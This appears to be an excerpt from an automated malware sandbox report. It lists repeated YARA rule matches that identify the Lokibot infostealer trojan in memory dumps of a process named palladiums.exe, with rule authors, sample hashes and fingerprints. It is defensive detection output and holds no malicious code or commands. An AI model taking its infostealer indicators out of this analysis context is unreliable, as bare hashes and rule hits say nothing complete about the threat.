Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
